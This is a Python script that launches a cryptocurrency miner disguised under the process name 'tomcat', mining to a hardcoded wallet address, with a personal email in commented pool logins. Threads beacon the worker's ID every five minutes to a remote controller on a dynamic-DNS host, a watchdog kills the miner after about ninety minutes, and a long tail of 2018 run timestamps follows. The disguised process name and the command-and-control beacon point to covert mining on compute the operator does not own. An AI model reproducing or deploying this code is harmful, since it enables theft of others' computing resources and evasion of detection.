import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:08.071813
#2018-02-17 17:03:04.334758
#2018-02-17 18:51:04.569957
#2018-02-17 20:38:03.688981
#2018-02-17 22:24:01.763254
#2018-02-18 00:08:06.461863
#2018-02-18 01:59:04.926141
#2018-02-18 03:46:02.085553
#2018-02-18 05:34:07.047099
#2018-02-18 07:27:05.232841
#2018-02-18 09:14:05.318512
#2018-02-18 11:01:01.955257
#2018-02-18 12:47:05.412148
#2018-02-18 14:33:05.121998
#2018-02-18 16:23:04.502367
#2018-02-18 18:12:01.972713
#2018-02-18 19:58:05.211831
#2018-02-18 21:44:06.245257
#2018-02-18 23:33:03.930256
#2018-02-19 01:19:07.424874
#2018-02-19 03:07:04.433149
#2018-02-19 04:52:04.584452
#2018-02-19 06:37:01.883152
#2018-02-19 08:26:08.747654
#2018-02-19 10:15:09.405580
#2018-02-19 12:04:06.355266
#2018-02-19 13:51:06.363843
#2018-02-19 15:41:07.616108
#2018-02-19 17:29:08.084622
#2018-02-19 19:17:02.100484
#2018-02-19 21:05:05.529245
#2018-02-19 22:50:09.698681
#2018-02-20 00:33:08.185462
#2018-02-20 02:22:03.895222
#2018-02-20 04:12:01.964900
#2018-02-20 05:55:04.093951
#2018-02-20 07:41:07.048206
#2018-02-20 09:26:05.702407
#2018-02-20 11:10:09.717680
#2018-02-20 12:57:09.628511
#2018-02-20 14:41:09.787944
#2018-02-20 16:26:11.409811
#2018-02-20 18:14:08.741548
#2018-02-20 20:06:10.210253
#2018-02-20 21:53:01.979774
#2018-02-20 23:34:01.460365
#2018-02-21 01:17:05.341176
#2018-02-21 03:04:07.624260
#2018-02-21 04:51:06.259845
#2018-02-21 06:40:03.990613
#2018-02-21 08:26:06.482002
#2018-02-21 10:12:08.938608
#2018-02-21 12:02:04.261858
#2018-02-21 13:50:10.710624
#2018-02-21 15:33:02.176598
#2018-02-21 17:22:08.500425
#2018-02-21 19:09:07.140010
#2018-02-21 20:57:05.596135
#2018-02-21 22:45:01.859998
#2018-02-22 00:35:07.095203
#2018-02-22 02:22:06.710678
#2018-02-22 04:10:08.107324
#2018-02-22 05:56:05.706485
#2018-02-22 07:42:08.676560
#2018-02-22 09:31:04.637357
#2018-02-22 11:16:02.035362
#2018-02-22 13:02:09.404977
#2018-02-22 14:51:02.043730
#2018-02-22 16:37:05.995712
#2018-02-22 18:22:08.727189
#2018-02-22 20:33:02.003935
#2018-02-22 22:18:03.762375
#2018-02-23 00:04:08.583164
#2018-02-23 01:52:05.575873
#2018-02-23 03:40:09.755261
#2018-02-23 05:25:07.655663
#2018-02-23 07:11:03.867220
#2018-02-23 09:16:06.356283
#2018-02-23 11:22:09.284887
#2018-02-23 13:12:04.356661
#2018-02-23 14:56:04.242099
#2018-02-23 16:44:08.324504
#2018-02-23 18:31:01.432324
#2018-02-23 20:16:06.475266
#2018-02-23 22:06:07.601738
#2018-02-23 23:54:07.797560
#2018-02-24 01:43:03.261367
#2018-02-24 03:35:04.942843
#2018-02-24 05:19:06.993260
#2018-02-24 07:07:03.336662
#2018-02-24 08:54:06.459161
#2018-02-24 10:54:07.250721
#2018-02-24 12:42:05.708651
#2018-02-24 14:31:07.359136
#2018-02-24 16:18:03.540720
#2018-02-24 18:12:04.451513
#2018-02-24 19:57:06.433040
#2018-02-24 21:41:01.305105
#2018-02-25 00:33:03.858364
#2018-02-25 04:02:04.053446
#2018-02-25 07:33:05.759450